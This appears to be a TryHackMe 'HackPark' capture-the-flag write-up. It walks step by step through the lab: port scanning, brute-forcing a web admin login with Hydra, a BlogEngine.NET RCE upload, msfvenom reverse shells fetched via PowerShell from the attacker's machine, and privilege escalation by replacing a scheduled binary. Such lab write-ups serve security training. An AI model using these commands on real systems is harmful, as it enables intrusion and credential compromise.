![]() |
---|
https://tryhackme.com/room/hackpark |
HackPark
SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate privileges to root.
Scanning
First run a simple port scan (without Ping)
nmap -Pn -p- <IP address target machine> -oN portscan
portscan:
# Nmap 7.92 scan initiated Fri Sep 30 01:06:47 2022 as: nmap -Pn -p- -oN portscan 10.10.104.183
Nmap scan report for 10.10.104.183
Host is up (0.039s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
# Nmap done at Fri Sep 30 01:08:46 2022 -- 1 IP address (1 host up) scanned in 119.37 seconds
Run an -A
scan on the open ports:
nmap -Pn -T4 -A -p80,3389 <IP address target machine> -oN servicescan
servicescan:
# Nmap 7.92 scan initiated Fri Sep 30 01:12:20 2022 as: nmap -Pn -T4 -A -p80,3389 -oN servicescan 10.10.104.183
Nmap scan report for 10.10.104.183
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2022-09-30T00:13:35+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-09-29T00:05:48
|_Not valid after: 2023-03-31T00:05:48
|_ssl-date: 2022-09-30T00:13:36+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 40.18 ms 10.9.0.1
2 40.14 ms 10.10.104.183
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 30 01:13:36 2022 -- 1 IP address (1 host up) scanned in 76.02 seconds
There is a web server running on port 80/tcp.
Exploring
A short exploration of the site gave me a username and a login page.
![]() |
---|
Welcome page clues |
A reverse image search gave the name of the clown.
The source code of the main page reveals an Administrator
user admin
. But we already knew that.
Brute-force admin
Identify what type of request the form is making to the webserver by going to the login page.
Copy the URL:
http://<IP address target machine>/Account/login.aspx?ReturnURL=/admin/
Type of request:
# curl -s http://<IP address target machine>/Account/login.aspx?ReturnURL=/admin/ | grep "<form"
<form method="post" action="login.aspx?ReturnURL=%2fadmin%2f" id="Form1">
Using Burpsuite Intruder, try a brute-force on that admin
user. Fire up Burpsuite, go to login page,
set Burpsuite to intercept, and try to log in. Catch the __VIEWSTATE
for use in Hydra.
![]() |
---|
__VIEWSTATE=HyDAVJBUzaoWbePyeU7aJWUKLoIeSNhkpLwoKuSJYYorT2mFK5gG3zW4y%2F aa0Nv60arFkTV0uFNS8cU8Zrhf3QFwm4LeDyJVKQOfqh0GHwiKFm0NU%2BBa hqGt9szkQqO6inS92zNkiQ2x6usDxT9Zumz3go6vwo3AfOWIfRNuJeYa%2FsbQ& __EVENTVALIDATION=lSQI5ypG9I3szy4G87w98h3YF4IR%2FNhNTjz1YjdKlGwjW uzNrGbLTR%2Bm%2FHYM84xxxticrZc8pgZrywRT5QrN2kYdTOWNlu0Iw%2FUYZcl fGLWghmvGeRx4rfh5oYC8QbeVh60uXYY0FpdFSJGJY4D56nvCYUwXjUfl4QlydaPXqAKiNcb9 &ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent %24LoginUser%24Password=admin&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in |
Mini hydra cheatsheet:
Command | Description |
---|---|
hydra -P |
Brute force against a protocol of your choice. |
hydra -v -V -u -L |
You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
hydra -t 1 -V -f -l |
Attack a Windows Remote Desktop with a password list. |
hydra -l log=^USER^&pwd=^PASS^&wp-submit= Log In&testcookie=1:S=Location' |
Craft a more specific request for Hydra to brute force. |
Constructing the hydra command:
-f
flag to stop the attack when a valid password is found-l
flag to specify the username for the bruteforce attack =admin
-P
flag to specify the wordlist to use for the bruteforce =/usr/share/wordlists/rockyou.txt
IP of the target server =
10.10.39.227
Type of attack =
http-post-form
Page to attack = “
/Account/login.aspx:__VIEWSTATE...
”In
__VIEWSTATE...
changeUserName=admin
toUserName=^USER^
In
__VIEWSTATE...
changePassword=admin
toPassword=^PASS^
Add a Failed login message to be able to detect when we have success =
:Login Failed
# hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.39.227 http-post-form "/Account/login.aspx:__VIEWSTATE=HyDAVJBUzaoWbePyeU7aJWUKLoIeSNhkpLwoKuSJYYorT2mFK5gG3zW4y%2Faa0Nv60arFkTV0uFNS8cU8Zrhf3QFwm4LeDyJVKQOfqh0GHwiKFm0NU%2BBahqGt9szkQqO6inS92zNkiQ2x6usDxT9Zumz3go6vwo3AfOWIfRNuJeYa%2FsbQ&__EVENTVALIDATION=lSQI5ypG9I3szy4G87w98h3YF4IR%2FNhNTjz1YjdKlGwjWuzNrGbLTR%2Bm%2FHYM84xxxticrZc8pgZrywRT5QrN2kYdTOWNlu0Iw%2FUYZclfGLWghmvGeRx4rfh5oYC8QbeVh60uXYY0FpdFSJGJY4D56nvCYUwXjUfl4QlydaPXqAKiNcb9&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed"
Results:
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-30 05:11:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.39.227:80/Account/login.aspx:__VIEWSTATE=HyDAVJBUzaoWbePyeU7aJWUKLoIeSNhkpLwoKuSJYYorT2mFK5gG3zW4y%2Faa0Nv60arFkTV0uFNS8cU8Zrhf3QFwm4LeDyJVKQOfqh0GHwiKFm0NU%2BBahqGt9szkQqO6inS92zNkiQ2x6usDxT9Zumz3go6vwo3AfOWIfRNuJeYa%2FsbQ&__EVENTVALIDATION=lSQI5ypG9I3szy4G87w98h3YF4IR%2FNhNTjz1YjdKlGwjWuzNrGbLTR%2Bm%2FHYM84xxxticrZc8pgZrywRT5QrN2kYdTOWNlu0Iw%2FUYZclfGLWghmvGeRx4rfh5oYC8QbeVh60uXYY0FpdFSJGJY4D56nvCYUwXjUfl4QlydaPXqAKiNcb9&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed
[80][http-post-form] host: 10.10.39.227 login: admin password: 1qaz2wsx
[STATUS] attack finished for 10.10.39.227 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-30 05:12:42
Compromise the machine
Logged in as admin, click on the “About” link from the menu.
![]() |
---|
About page with version information |
# searchsploit blogengine 3.3.6
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execu | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/47014.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
More on that:
# searchsploit -m aspx/webapps/46353.cs
Exploit: BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
URL: https://www.exploit-db.com/exploits/46353
Path: /usr/share/exploitdb/exploits/aspx/webapps/46353.cs
File Type: HTML document, ASCII text
Copied to: /home/nina/Downloads/46353.cs
Get the CVE:
# grep CVE 46353.cs
# CVE : CVE-2019-6714
With possible exploit BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution
Download and modify the IP and port values in the script.
![]() |
---|
Change IP address to the IP address of the attack machine, and port to listening port (4442) |
Save and rename script to
PostView.ascx
Go to posts (
http://IP address target machine/admin/#/content/posts
) and click on “Welcome to HackPark” to edit it.
![]() |
---|
There it is |
On the edit bar on top of the post, click on the “File Manager” icon.
![]() |
---|
Not easy to find |
Click on the “+ UPLOAD” button and upload the
PostView.ascx
scriptClose the file manager and click on “Save”
Start a listener with the port as entered in the script
# rlwrap nc -nlvp 4442
Go to
http://IP address target machine/?theme=../../App_Data/files
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
Privilege escalation
Pivot from netcat to a meterpreter session, and enumerate the machine to identify potential vulnerabilities. Then use this gathered information to exploit the system and become Administrator.
# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<IP address attack machine> LPORT=5555 -f exe -o revshell.exe
In the directory where the revshell.exe
is, start a web server:
# python3 -m http.server 8000
In the reverse shell we already have:
powershell -c "Invoke-WebRequest -Uri 'http://IP address attack machine:8000/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
In a new terminal, set up a Metasploit multi-handler:
# msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP address attack machine>
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on <IP address attack machine>:5555
In the reverse shell terminal, start the executable:
C:\windows\system32\inetsrv>cd \windows\temp
c:\Windows\Temp>.\revshell.exe
In the msfconsole
terminal, a meterpreter
shell has appeared:
meterpreter >
Get detailed information about the Windows system:
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
Processes:
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
68 676 svchost.exe
352 676 svchost.exe
368 4 smss.exe
524 516 csrss.exe
576 568 csrss.exe
584 516 wininit.exe
612 568 winlogon.exe
676 584 services.exe
684 584 lsass.exe
748 676 svchost.exe
792 676 svchost.exe
832 1404 revshell.exe x86 0 IIS APPPOOL\Blog c:\Windows\Temp\revshell.exe
876 612 dwm.exe
884 676 svchost.exe
912 676 svchost.exe
964 676 svchost.exe
1148 676 spoolsv.exe
1176 676 amazon-ssm-agent.exe
1252 676 svchost.exe
1284 676 LiteAgent.exe
1356 676 svchost.exe
1372 676 svchost.exe
1404 2952 cmd.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\cmd.exe
1432 676 WService.exe
1560 1432 WScheduler.exe
1652 676 Ec2Config.exe
1784 748 WmiPrvSE.exe
2028 676 svchost.exe
2300 2388 Message.exe
2340 1404 conhost.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\conhost.exe
2388 3068 WScheduler.exe
2488 912 taskhostex.exe
2564 2556 explorer.exe
2600 676 msdtc.exe
2952 1372 w3wp.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\inetsrv\w3wp.exe
3016 2516 ServerManager.exe
Program files:
meterpreter > cd "c:\program files (x86)"
meterpreter > ls
Listing: c:\program files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2013-08-22 16:39:30 +0100 Common Files
040777/rwxrwxrwx 4096 dir 2014-03-21 19:07:01 +0000 Internet Explorer
040777/rwxrwxrwx 0 dir 2013-08-22 16:39:30 +0100 Microsoft.NET
040777/rwxrwxrwx 8192 dir 2019-08-04 12:37:02 +0100 SystemScheduler
040777/rwxrwxrwx 0 dir 2019-08-06 22:12:04 +0100 Uninstall Information
040777/rwxrwxrwx 0 dir 2013-08-22 16:39:33 +0100 Windows Mail
040777/rwxrwxrwx 0 dir 2013-08-22 16:39:30 +0100 Windows NT
040777/rwxrwxrwx 0 dir 2013-08-22 16:39:30 +0100 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 16:37:57 +0100 desktop.ini
Ah. SystemScheduler:
meterpreter > cd SystemScheduler
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 4096 dir 2022-09-30 19:49:34 +0100 Events
100666/rw-rw-rw- 60 fil 2019-08-04 12:36:42 +0100 Forum.url
100666/rw-rw-rw- 9813 fil 2004-11-16 07:16:34 +0000 License.txt
100666/rw-rw-rw- 1496 fil 2022-09-30 18:48:54 +0100 LogFile.txt
100666/rw-rw-rw- 3760 fil 2022-09-30 18:49:25 +0100 LogfileAdvanced.txt
100777/rwxrwxrwx 536992 fil 2018-03-25 18:58:56 +0100 Message.exe
100777/rwxrwxrwx 445344 fil 2018-03-25 18:59:00 +0100 PlaySound.exe
100777/rwxrwxrwx 27040 fil 2018-03-25 18:58:58 +0100 PlayWAV.exe
100666/rw-rw-rw- 149 fil 2019-08-04 23:05:19 +0100 Preferences.ini
100777/rwxrwxrwx 485792 fil 2018-03-25 18:58:58 +0100 Privilege.exe
100666/rw-rw-rw- 10100 fil 2018-03-24 19:09:04 +0000 ReadMe.txt
100777/rwxrwxrwx 112544 fil 2018-03-25 18:58:58 +0100 RunNow.exe
100777/rwxrwxrwx 235936 fil 2018-03-25 18:58:56 +0100 SSAdmin.exe
100777/rwxrwxrwx 731552 fil 2018-03-25 18:58:56 +0100 SSCmd.exe
100777/rwxrwxrwx 456608 fil 2018-03-25 18:58:58 +0100 SSMail.exe
100777/rwxrwxrwx 1633696 fil 2018-03-25 18:58:52 +0100 Scheduler.exe
100777/rwxrwxrwx 491936 fil 2018-03-25 18:59:00 +0100 SendKeysHelper.exe
100777/rwxrwxrwx 437664 fil 2018-03-25 18:58:56 +0100 ShowXY.exe
100777/rwxrwxrwx 439712 fil 2018-03-25 18:58:56 +0100 ShutdownGUI.exe
100666/rw-rw-rw- 785042 fil 2006-05-17 00:49:52 +0100 WSCHEDULER.CHM
100666/rw-rw-rw- 703081 fil 2006-05-17 00:58:18 +0100 WSCHEDULER.HLP
100777/rwxrwxrwx 136096 fil 2018-03-25 18:58:58 +0100 WSCtrl.exe
100777/rwxrwxrwx 68512 fil 2018-03-25 18:58:54 +0100 WSLogon.exe
100666/rw-rw-rw- 33184 fil 2018-03-25 18:59:00 +0100 WSProc.dll
100666/rw-rw-rw- 2026 fil 2006-05-16 23:58:18 +0100 WScheduler.cnt
100777/rwxrwxrwx 331168 fil 2018-03-25 18:58:52 +0100 WScheduler.exe
100777/rwxrwxrwx 98720 fil 2018-03-25 18:58:54 +0100 WService.exe
100666/rw-rw-rw- 54 fil 2019-08-04 12:36:42 +0100 Website.url
100777/rwxrwxrwx 76704 fil 2018-03-25 18:58:58 +0100 WhoAmI.exe
100666/rw-rw-rw- 1150 fil 2007-05-17 21:47:02 +0100 alarmclock.ico
100666/rw-rw-rw- 766 fil 2003-08-31 20:06:08 +0100 clock.ico
100666/rw-rw-rw- 80856 fil 2003-08-31 20:06:10 +0100 ding.wav
100666/rw-rw-rw- 1637972 fil 2009-01-09 03:21:48 +0000 libeay32.dll
100777/rwxrwxrwx 40352 fil 2018-03-25 18:59:00 +0100 sc32.exe
100666/rw-rw-rw- 766 fil 2003-08-31 20:06:26 +0100 schedule.ico
100666/rw-rw-rw- 355446 fil 2009-01-09 03:12:34 +0000 ssleay32.dll
100666/rw-rw-rw- 6999 fil 2019-08-04 12:36:42 +0100 unins000.dat
100777/rwxrwxrwx 722597 fil 2019-08-04 12:36:32 +0100 unins000.exe
100666/rw-rw-rw- 6574 fil 2009-06-27 01:27:32 +0100 whiteclock.ico
Events:
meterpreter > cd events
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler\events
======================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1926 fil 2022-09-30 19:50:01 +0100 20198415519.INI
100666/rw-rw-rw- 26066 fil 2022-09-30 19:50:01 +0100 20198415519.INI_LOG.txt
100666/rw-rw-rw- 290 fil 2020-10-02 22:50:12 +0100 2020102145012.INI
100666/rw-rw-rw- 186 fil 2022-09-30 19:40:50 +0100 Administrator.flg
100666/rw-rw-rw- 182 fil 2022-09-30 19:40:48 +0100 SYSTEM_svc.flg
100666/rw-rw-rw- 0 fil 2022-09-30 18:49:25 +0100 Scheduler.flg
100666/rw-rw-rw- 449 fil 2022-09-30 19:40:50 +0100 SessionInfo.flg
100666/rw-rw-rw- 57 fil 2022-09-30 19:50:32 +0100 Update.flg
100666/rw-rw-rw- 0 fil 2022-09-30 19:41:10 +0100 service.flg
meterpreter >
We have an executable called Message.exe
being executed (every 30 minutes) by administrator in a directory that has
Everyone WriteData/CreateFiles
permissions. Replace C:\Program Files (x86)\SystemScheduler\Message.exe
with a reverse shell.
Create the payload:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<IP address attack machine> LPORT=6666 -f exe -o Message.exe
In the directory with the exploit, start a http server:
# python3 -m http.server 8080
In Metasploit, set up a multi-handler:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP address attack machine>
msf6 exploit(multi/handler) > set LPORT 6666
msf6 exploit(multi/handler) > run
In the existing reverse shell terminal, download the new reverse shell and replace the existing Message.exe
:
powershell -c "Invoke-WebRequest -Uri 'http://IP address attack machine:8080/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
User flag
meterpreter > getuid
Server username: HACKPARK\Administrator
meterpreter > cd c:\users\jeff\desktop\
meterpreter > cat user.txt
Root flag
meterpreter > cd C:\users\administrator\desktop
meterpreter > cat root.txt
Privilege escalation without Metasploit
Get WinPEAS:
# wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
Start a http server:
# python -m http.server 8888
In the meterpreter shell, drop into a normal cmd shell, cd in to the Temp folder which is writeable by everyone, then use PowerShell to pull winPEAS over:
meterpreter > shell
C:\Windows\Temp> powershell -c "Invoke-WebRequest -Uri 'http://<IP address target>:8888/WinPEAS.exe' -OutFile 'c:\windows\temp\winpeas.exe'"
C:\Windows\Temp> winpeas.exe
A lot of output. The Services Information section:
========================================(Services Information)========================================
[+] Interesting Services -non Microsoft-
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
Amazon EC2Launch(Amazon Web Services, Inc. - Amazon EC2Launch)["C:\Program Files\Amazon\EC2Launch\EC2Launch.exe" service] - Auto - Stopped
Amazon EC2Launch
=================================================================================================
AmazonSSMAgent(Amazon SSM Agent)["C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"] - Auto - Running
Amazon SSM Agent
=================================================================================================
AWSLiteAgent(Amazon Inc. - AWS Lite Guest Agent)[C:\Program Files\Amazon\XenTools\LiteAgent.exe] - Auto - Running - No quotes and Space detected
AWS Lite Guest Agent
=================================================================================================
Ec2Config(Amazon Web Services, Inc. - Ec2Config)["C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe"] - Auto - Running - isDotNet
Ec2 Configuration Service
=================================================================================================
PsShutdownSvc(Systems Internals - PsShutdown)[C:\Windows\PSSDNSVC.EXE] - Manual - Stopped
=================================================================================================
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
File Permissions: Everyone [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
System Scheduler Service Wrapper
=================================================================================================
The last one indicates a possible DLL hijack. On Exploit-DB: Splinterware System Scheduler Pro 5.12 - Privilege Escalation